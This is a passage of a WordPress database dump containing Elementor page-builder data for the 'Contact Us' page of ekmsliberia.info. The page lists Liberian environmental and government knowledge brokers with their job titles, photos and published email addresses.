href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23369,3395,'_elementor_edit_mode','builder'),(23370,3395,'_elementor_template_type','wp-page'),(23371,3395,'_elementor_version','3.0.16'),(23372,3395,'_wp_page_template','default'),(23373,3395,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br 